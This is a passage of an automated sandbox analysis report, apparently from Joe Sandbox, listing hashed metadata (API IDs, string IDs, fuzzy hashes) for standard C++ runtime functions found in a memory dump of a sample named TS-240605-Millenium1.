2174 7ffe1a452fa5-7ffe1a452fa7 2166->2174 2167->2126 2168->2160 2169->2168 2175 7ffe1a452f73-7ffe1a452f92 call 7ffe1a452a20 call 7ffe1a461090 2169->2175 2171->2155 2173->2128 2177 7ffe1a452fba 2174->2177 2178 7ffe1a452fa9-7ffe1a452fb8 call 7ffe1a4603b8 2174->2178 2175->2173 2176->2173 2180 7ffe1a452f2f 2176->2180 2182 7ffe1a452fbd-7ffe1a452fc0 2177->2182 2178->2182 2180->2155 2182->2167 2185 7ffe1a452fc2-7ffe1a452fd1 2182->2185 2185->2173
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.1861055825.00007FFE1A451000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A450000, based on PE: true
                                                                                          • Associated: 00000002.00000002.1861031826.00007FFE1A450000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1861085932.00007FFE1A463000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1861109591.00007FFE1A468000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1861134553.00007FFE1A469000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_7ffe1a450000_TS-240605-Millenium1.jbxd
                                                                                          Similarity
                                                                                          • API ID: abort$AdjustPointer
                                                                                          • String ID:
                                                                                          • API String ID: 1501936508-0
                                                                                          • Opcode ID: d568fcbafcd5d9e8e83e95e63f5b62363508f79f2b2b670005157146ca98b55e
                                                                                          • Instruction ID: e40670b8eb57816f2c1d056eca00c665782a1e9bb4590be741aafe81845a1856
                                                                                          • Opcode Fuzzy Hash: d568fcbafcd5d9e8e83e95e63f5b62363508f79f2b2b670005157146ca98b55e
                                                                                          • Instruction Fuzzy Hash: E451D8A2B09E4281EEA5EB53A44463C63A4AF54FB4F0584F7EA5D077B4DF3CE4619700
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.1861055825.00007FFE1A451000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A450000, based on PE: true
                                                                                          • Associated: 00000002.00000002.1861031826.00007FFE1A450000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1861085932.00007FFE1A463000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1861109591.00007FFE1A468000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1861134553.00007FFE1A469000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_7ffe1a450000_TS-240605-Millenium1.jbxd
                                                                                          Similarity
                                                                                          • API ID: Name::operator+
                                                                                          • String ID: {for
                                                                                          • API String ID: 2943138195-864106941
                                                                                          • Opcode ID: ad201dfe96a96ae0dc6555201844fc758e8e36effd4b63a30410ed7392a88b68
                                                                                          • Instruction ID: a7c774f889c1db850d00febc479d16f6673b4272eb53b0ad85fbbb64df639d16
                                                                                          • Opcode Fuzzy Hash: ad201dfe96a96ae0dc6555201844fc758e8e36effd4b63a30410ed7392a88b68
                                                                                          • Instruction Fuzzy Hash: 4B513CB2B08E45A9F711AF26D4413F837A1EB45B58F4084B2EA4C07BA5DF7CD564C700
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.1861055825.00007FFE1A451000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A450000, based on PE: true
                                                                                          • Associated: 00000002.00000002.1861031826.00007FFE1A450000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1861085932.00007FFE1A463000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1861109591.00007FFE1A468000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1861134553.00007FFE1A469000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_7ffe1a450000_TS-240605-Millenium1.jbxd
                                                                                          Similarity
                                                                                          • API ID: NameName::atol
                                                                                          • String ID: `template-parameter$void
                                                                                          • API String ID: 2130343216-4057429177
                                                                                          • Opcode ID: 1a349dcf90f4e371f1810c8875e562b3843b42aeee856190ba29246ab6ec8260
                                                                                          • Instruction ID: 65f398a89f83fb43c1b66a9be4ed9a392c78d19a3d9c7cbe8bf1b71a77ebed61
                                                                                          • Opcode Fuzzy Hash: 1a349dcf90f4e371f1810c8875e562b3843b42aeee856190ba29246ab6ec8260
                                                                                          • Instruction Fuzzy Hash: 7A414BA2F08F5688FB11DBA2D8512FC23B1BB48BA4F5441B6DE0C17669DF7CA565C340
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.1861055825.00007FFE1A451000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A450000, based on PE: true
                                                                                          • Associated: 00000002.00000002.1861031826.00007FFE1A450000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1861085932.00007FFE1A463000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1861109591.00007FFE1A468000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1861134553.00007FFE1A469000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_7ffe1a450000_TS-240605-Millenium1.jbxd
                                                                                          Similarity
                                                                                          • API ID: Name::operator+Replicator::operator[]
                                                                                          • String ID: ,...$,<ellipsis>$...$<ellipsis>$void
                                                                                          • API String ID: 1405650943-2211150622
                                                                                          • Opcode ID: cc95b6719b0dfac949915fa95283a824f9a94d2610a8c8b5f10b5de908d24d67
                                                                                          • Instruction ID: a452b16370b518dbc48d18b56aeada359cb9f7a9f502f39c13c0ae49ebffb65d
                                                                                          • Opcode Fuzzy Hash: cc95b6719b0dfac949915fa95283a824f9a94d2610a8c8b5f10b5de908d24d67
                                                                                          • Instruction Fuzzy Hash: A64126B2B08E469CF7029BA6D8502B837B1BB08B68F9445F2CA5C13765DF7CA564D700
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.1861055825.00007FFE1A451000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A450000, based on PE: true
                                                                                          • Associated: 00000002.00000002.1861031826.00007FFE1A450000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1861085932.00007FFE1A463000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1861109591.00007FFE1A468000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1861134553.00007FFE1A469000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_7ffe1a450000_TS-240605-Millenium1.jbxd
                                                                                          Similarity
                                                                                          • API ID: Name::operator+
                                                                                          • String ID: char $int $long $short $unsigned
                                                                                          • API String ID: 2943138195-3894466517
                                                                                          • Opcode ID: 041e2dffe1b489bc893f09ff0a4f423b3d9eca273271e83df22d622629981137
                                                                                          • Instruction ID: 1401689a4dfaf7cc22e032df7bb4adae8887ced41eef325a4d0b7d3a7c4ee6aa
                                                                                          • Opcode Fuzzy Hash: 041e2dffe1b489bc893f09ff0a4f423b3d9eca273271e83df22d622629981137
                                                                                          • Instruction Fuzzy Hash: FA3151B2B18F5188FB01AF6AD8541BC27B2BB09B55F4481F2DA4C07779DE3C9568CB10
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.1861055825.00007FFE1A451000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A450000, based on PE: true
                                                                                          • Associated: 00000002.00000002.1861031826.00007FFE1A450000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1861085932.00007FFE1A463000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1861109591.00007FFE1A468000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1861134553.00007FFE1A469000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_7ffe1a450000_TS-240605-Millenium1.jbxd
                                                                                          Similarity
                                                                                          • API ID: Name::operator+$NameName::
                                                                                          • String ID:
                                                                                          • API String ID: 168861036-0
                                                                                          • Opcode ID: 80a690cc5bf4571957900b2ba371d1f0df44bd22a0b18b914ff66e25afa9163e
                                                                                          • Instruction ID: 24c0c3a8ebe99c137ac6d4cd598463d31257035ead3d87dccea6baa833f6595b
                                                                                          • Opcode Fuzzy Hash: 80a690cc5bf4571957900b2ba371d1f0df44bd22a0b18b914ff66e25afa9163e
                                                                                          • Instruction Fuzzy Hash: FB7169B2B08F4289F711DBA2E8902BC37A1BB44B64F5080F6DA1D176A5DF79E462C740
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.1861055825.00007FFE1A451000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A450000, based on PE: true
                                                                                          • Associated: 00000002.00000002.1861031826.00007FFE1A450000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1861085932.00007FFE1A463000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1861109591.00007FFE1A468000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1861134553.00007FFE1A469000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_7ffe1a450000_TS-240605-Millenium1.jbxd
                                                                                          Similarity
                                                                                          • API ID: free$EntryInterlockedListNamePush__unmallocstrcpy_s
                                                                                          • String ID:
                                                                                          • API String ID: 3741236498-0
                                                                                          • Opcode ID: 0fa2fcead297943da074142d2fbec92c84cd60449e30d9ad217028345c3eb4d3
                                                                                          • Instruction ID: 2c22617a3d5710520fa0a9b58cdcc255bf9f470f33cf0513c182b61d8dba4c76
                                                                                          • Opcode Fuzzy Hash: 0fa2fcead297943da074142d2fbec92c84cd60449e30d9ad217028345c3eb4d3
                                                                                          • Instruction Fuzzy Hash: 2631A462B19F9151EA15EB27A80457973A0FF49FF0B5985B2DD2D033A0EE7DE865C300
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.1861055825.00007FFE1A451000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A450000, based on PE: true
                                                                                          • Associated: 00000002.00000002.1861031826.00007FFE1A450000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1861085932.00007FFE1A463000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1861109591.00007FFE1A468000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1861134553.00007FFE1A469000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_7ffe1a450000_TS-240605-Millenium1.jbxd
                                                                                          Similarity
                                                                                          • API ID: abort$CallEncodePointerTranslator
                                                                                          • String ID: MOC$RCC
                                                                                          • API String ID: 2889003569-2084237596
                                                                                          • Opcode ID: 93ffbb8a8c38b724cb13d32310db34e78531563cac4ba1370c621256939a6833
                                                                                          • Instruction ID: 817ccf16e5f614c8ae2b0fa91b85b32bd61ce66d1facdc8703b5e3ccb96781d0
                                                                                          • Opcode Fuzzy Hash: 93ffbb8a8c38b724cb13d32310db34e78531563cac4ba1370c621256939a6833
                                                                                          • Instruction Fuzzy Hash: 8591B3B3B08B918AE750DB66E4402BD77B1F744B98F1041AAEE8D4BB65DF38D165C700
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.1861055825.00007FFE1A451000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A450000, based on PE: true
                                                                                          • Associated: 00000002.00000002.1861031826.00007FFE1A450000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1861085932.00007FFE1A463000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1861109591.00007FFE1A468000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1861134553.00007FFE1A469000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_7ffe1a450000_TS-240605-Millenium1.jbxd
                                                                                          Similarity
                                                                                          • API ID: Name::operator+
                                                                                          • String ID: std::nullptr_t$std::nullptr_t $volatile$volatile
                                                                                          • API String ID: 2943138195-757766384
                                                                                          • Opcode ID: 01adbf8b940f63687fb8b05ad2c3f4aee868cfabe9c87335b9cb2bee01f92b8d
                                                                                          • Instruction ID: 7a7b97423d2f4e3aed724f1d9a5f055a775e46facd1498bf98c907ba038ee296
                                                                                          • Opcode Fuzzy Hash: 01adbf8b940f63687fb8b05ad2c3f4aee868cfabe9c87335b9cb2bee01f92b8d
                                                                                          • Instruction Fuzzy Hash: C6714AB2B08E4688FB14AB2699500B867B5BB05BA4F8446F7DA4D53AA5DF2CE170C344
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.1861055825.00007FFE1A451000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A450000, based on PE: true
                                                                                          • Associated: 00000002.00000002.1861031826.00007FFE1A450000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1861085932.00007FFE1A463000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1861109591.00007FFE1A468000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1861134553.00007FFE1A469000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_7ffe1a450000_TS-240605-Millenium1.jbxd
                                                                                          Similarity
                                                                                          • API ID: abort$CallEncodePointerTranslator
                                                                                          • String ID: MOC$RCC
                                                                                          • API String ID: 2889003569-2084237596
                                                                                          • Opcode ID: 8e034f92e989b9960bc08160daca0ef1833c14a7b13808a87468da7d70181806
                                                                                          • Instruction ID: e71589378b1fe1701979186732e1bc8cec8fc63fd15ceeb90e19ffd39fffeafd
                                                                                          • Opcode Fuzzy Hash: 8e034f92e989b9960bc08160daca0ef1833c14a7b13808a87468da7d70181806
                                                                                          • Instruction Fuzzy Hash: 16619773A08FC581D7619B16E4403B9B7A0FB85BA4F0442A6EB9D43765DF3CE1A4CB00
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.1861055825.00007FFE1A451000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A450000, based on PE: true
                                                                                          • Associated: 00000002.00000002.1861031826.00007FFE1A450000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1861085932.00007FFE1A463000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1861109591.00007FFE1A468000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1861134553.00007FFE1A469000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_7ffe1a450000_TS-240605-Millenium1.jbxd
                                                                                          Similarity
                                                                                          • API ID: FileHeader
                                                                                          • String ID: MOC$RCC$csm$csm
                                                                                          • API String ID: 104395404-1441736206
                                                                                          • Opcode ID: 5815091cf7d4bf77be2b6452b49c3696097c0f3c73df3e225fc204c9d15c1510
                                                                                          • Instruction ID: 0498f6a2c30bcfe646609de0339eedfc56350870012fcedeb6dc47dcf2698f5c
                                                                                          • Opcode Fuzzy Hash: 5815091cf7d4bf77be2b6452b49c3696097c0f3c73df3e225fc204c9d15c1510
                                                                                          • Instruction Fuzzy Hash: 2F5190B2B09A4296EAA0AB27914417D76A0FF44F65F1440F3EE4D87761DF3CE4718B82
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.1861055825.00007FFE1A451000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A450000, based on PE: true
                                                                                          • Associated: 00000002.00000002.1861031826.00007FFE1A450000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1861085932.00007FFE1A463000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1861109591.00007FFE1A468000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1861134553.00007FFE1A469000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_7ffe1a450000_TS-240605-Millenium1.jbxd
                                                                                          Similarity
                                                                                          • API ID: NameName::$Name::operator+
                                                                                          • String ID:
                                                                                          • API String ID: 826178784-0
                                                                                          • Opcode ID: f125dc20a4fc2cff283c2e4d5124f38be857c51718d1d3c9008137230ed817e4
                                                                                          • Instruction ID: c27719cab2395f36c17cfd406b8932f99f659b90677ac9e23bdfdc20e0fe4823
                                                                                          • Opcode Fuzzy Hash: f125dc20a4fc2cff283c2e4d5124f38be857c51718d1d3c9008137230ed817e4
                                                                                          • Instruction Fuzzy Hash: 54414CA2B19F5298EB10EB22E8541B827B4BF15FA4F9444F3DA4D537A5DF38E865C300
                                                                                          APIs
                                                                                            • Part of subcall function 00007FFE1A456E48: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FFE1A4529EE), ref: 00007FFE1A456E56
                                                                                          • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE1A45488B
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.1861055825.00007FFE1A451000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A450000, based on PE: true
                                                                                          • Associated: 00000002.00000002.1861031826.00007FFE1A450000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1861085932.00007FFE1A463000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1861109591.00007FFE1A468000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1861134553.00007FFE1A469000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_7ffe1a450000_TS-240605-Millenium1.jbxd
                                                                                          Similarity
                                                                                          • API ID: abort
                                                                                          • String ID: $csm$csm
                                                                                          • API String ID: 4206212132-1512788406
                                                                                          • Opcode ID: bd14039b9dc44c48f3afba7226bd4a8f48c08aeb5fb2f86f7c5774b76e28317a
                                                                                          • Instruction ID: 981da8115c9b48803b9ad4d14fb071730699ec5304509786106cb108d2509734
                                                                                          • Opcode Fuzzy Hash: bd14039b9dc44c48f3afba7226bd4a8f48c08aeb5fb2f86f7c5774b76e28317a
                                                                                          • Instruction Fuzzy Hash: 8D71D4B2B08AC186D7659F26D04037D7BA1FB41FA8F0481B2DA8D0B6AACB3CD461C741
                                                                                          APIs
                                                                                            • Part of subcall function 00007FFE1A456E48: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FFE1A4529EE), ref: 00007FFE1A456E56
                                                                                          • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE1A4545DB
                                                                                          • __FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 00007FFE1A4545EB
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.1861055825.00007FFE1A451000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A450000, based on PE: true
                                                                                          • Associated: 00000002.00000002.1861031826.00007FFE1A450000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1861085932.00007FFE1A463000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1861109591.00007FFE1A468000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1861134553.00007FFE1A469000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_7ffe1a450000_TS-240605-Millenium1.jbxd
                                                                                          Similarity
                                                                                          • API ID: Frameabort$EmptyHandler3::StateUnwind
                                                                                          • String ID: csm$csm
                                                                                          • API String ID: 4108983575-3733052814
                                                                                          • Opcode ID: 08ef0bffa0d8dc861c4a01b7d2fd628c67e896dc6c26123b9582640005c51e48
                                                                                          • Instruction ID: de0bbe02d8b80d45672660b4dc0e76c3c97907b3f4d833729b3815f7139b15e7
                                                                                          • Opcode Fuzzy Hash: 08ef0bffa0d8dc861c4a01b7d2fd628c67e896dc6c26123b9582640005c51e48
                                                                                          • Instruction Fuzzy Hash: DC51A4B2B08A8586EB649B12914437976A1FB50FA4F1441F7DB4C4BBA6CF3CE571CB00
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.1861055825.00007FFE1A451000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A450000, based on PE: true
                                                                                          • Associated: 00000002.00000002.1861031826.00007FFE1A450000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1861085932.00007FFE1A463000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1861109591.00007FFE1A468000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1861134553.00007FFE1A469000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_7ffe1a450000_TS-240605-Millenium1.jbxd
                                                                                          Similarity
                                                                                          • API ID: NameName::
                                                                                          • String ID: %lf
                                                                                          • API String ID: 1333004437-2891890143
                                                                                          • Opcode ID: 7e0deb2cf17bd330c849068a4ca2fc9bc064bfcc9212df10860184869afe9d43
                                                                                          • Instruction ID: d2b3330a5854bd68c2839003d70c3650593197a4c269079963081034022440b0
                                                                                          • Opcode Fuzzy Hash: 7e0deb2cf17bd330c849068a4ca2fc9bc064bfcc9212df10860184869afe9d43
                                                                                          • Instruction Fuzzy Hash: B331B7A1B0CF4685EA11EB13A8501BA7361BF55FA0F5481F7EA5E53771EE2CE162C700
                                                                                          APIs
                                                                                            • Part of subcall function 00007FFE1A456E48: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FFE1A4529EE), ref: 00007FFE1A456E56
                                                                                          • terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE1A452A8E
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.1861055825.00007FFE1A451000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A450000, based on PE: true
                                                                                          • Associated: 00000002.00000002.1861031826.00007FFE1A450000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1861085932.00007FFE1A463000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1861109591.00007FFE1A468000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1861134553.00007FFE1A469000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_7ffe1a450000_TS-240605-Millenium1.jbxd
                                                                                          Similarity
                                                                                          • API ID: abortterminate
                                                                                          • String ID: MOC$RCC$csm
                                                                                          • API String ID: 661698970-2671469338
                                                                                          • Opcode ID: 3ab94ae7472f91afbfb2fa40e8eaefdcfa6935c471aaf11af4776549d32657f7
                                                                                          • Instruction ID: bf05f5ed05f654c924678f930fc850e68dc2489998943898e4d87e2a05e401aa
                                                                                          • Opcode Fuzzy Hash: 3ab94ae7472f91afbfb2fa40e8eaefdcfa6935c471aaf11af4776549d32657f7
                                                                                          • Instruction Fuzzy Hash: EBF03C72A18A0686E7A47B63E18107D7664EF48F61F1950F3EB4806262CF7CE8B0C701
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.1861055825.00007FFE1A451000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A450000, based on PE: true
                                                                                          • Associated: 00000002.00000002.1861031826.00007FFE1A450000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1861085932.00007FFE1A463000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1861109591.00007FFE1A468000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1861134553.00007FFE1A469000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_7ffe1a450000_TS-240605-Millenium1.jbxd
                                                                                          Similarity
                                                                                          • API ID: Name::operator+
                                                                                          • String ID:
                                                                                          • API String ID: 2943138195-0
                                                                                          • Opcode ID: cc076bc81e8f2d48ba6aefa04368e4e4f2bc5c7ef048a26b3748b4f62f7846b0
                                                                                          • Instruction ID: e2f86aca1f601f7042d61afb5962c07a50ea380ada2080909daca55c9a1d71c2
                                                                                          • Opcode Fuzzy Hash: cc076bc81e8f2d48ba6aefa04368e4e4f2bc5c7ef048a26b3748b4f62f7846b0
                                                                                          • Instruction Fuzzy Hash: FA914BA2F08F5289F7119B66D8443BC37B1BB04B68F5440F7DA4D176A5DF78A8A6C340
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.1861055825.00007FFE1A451000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A450000, based on PE: true
                                                                                          • Associated: 00000002.00000002.1861031826.00007FFE1A450000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1861085932.00007FFE1A463000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1861109591.00007FFE1A468000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1861134553.00007FFE1A469000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_7ffe1a450000_TS-240605-Millenium1.jbxd
                                                                                          Similarity
                                                                                          • API ID: Name::operator+$Replicator::operator[]
                                                                                          • String ID:
                                                                                          • API String ID: 3863519203-0
                                                                                          • Opcode ID: 57265f9aaea93611d8ae4b0edf9f43af56394ecd72ecd9aef4b3b93798ee479d
                                                                                          • Instruction ID: 9e8a31f296105f5cfc6c94cd492f7fb90470b07ebc3ddefbf57ebb7c5ca3f9eb
                                                                                          • Opcode Fuzzy Hash: 57265f9aaea93611d8ae4b0edf9f43af56394ecd72ecd9aef4b3b93798ee479d
                                                                                          • Instruction Fuzzy Hash: 104166B2B08B4189FB01DF66D8403BC37B0BB48B68F9484B6DA8D57769DF789495C350
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.1861055825.00007FFE1A451000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A450000, based on PE: true
                                                                                          • Associated: 00000002.00000002.1861031826.00007FFE1A450000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1861085932.00007FFE1A463000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1861109591.00007FFE1A468000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1861134553.00007FFE1A469000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_7ffe1a450000_TS-240605-Millenium1.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                          • String ID:
                                                                                          • API String ID: 2933794660-0
                                                                                          • Opcode ID: 74344bb322e65ea4bb1ed5ded81f371800f489492d84809563666ba838173471
                                                                                          • Instruction ID: 33dffdaf724ecdefb08a3f1d2a2de64897ed55664a948e8fbf907ee1024d40a7
                                                                                          • Opcode Fuzzy Hash: 74344bb322e65ea4bb1ed5ded81f371800f489492d84809563666ba838173471
                                                                                          • Instruction Fuzzy Hash: 7E113022B18F418AEB00CF61E8542B833B4F759B68F440E72DA6D477A8DF7CE1688340
                                                                                          APIs
                                                                                          Strings
